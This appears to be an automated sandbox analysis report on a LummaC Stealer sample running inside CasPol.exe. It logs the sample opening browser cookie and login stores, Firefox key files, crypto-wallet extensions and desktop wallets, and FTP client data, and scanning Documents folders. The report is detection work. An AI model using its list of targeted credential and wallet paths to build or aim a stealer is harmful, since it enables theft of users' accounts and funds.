Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
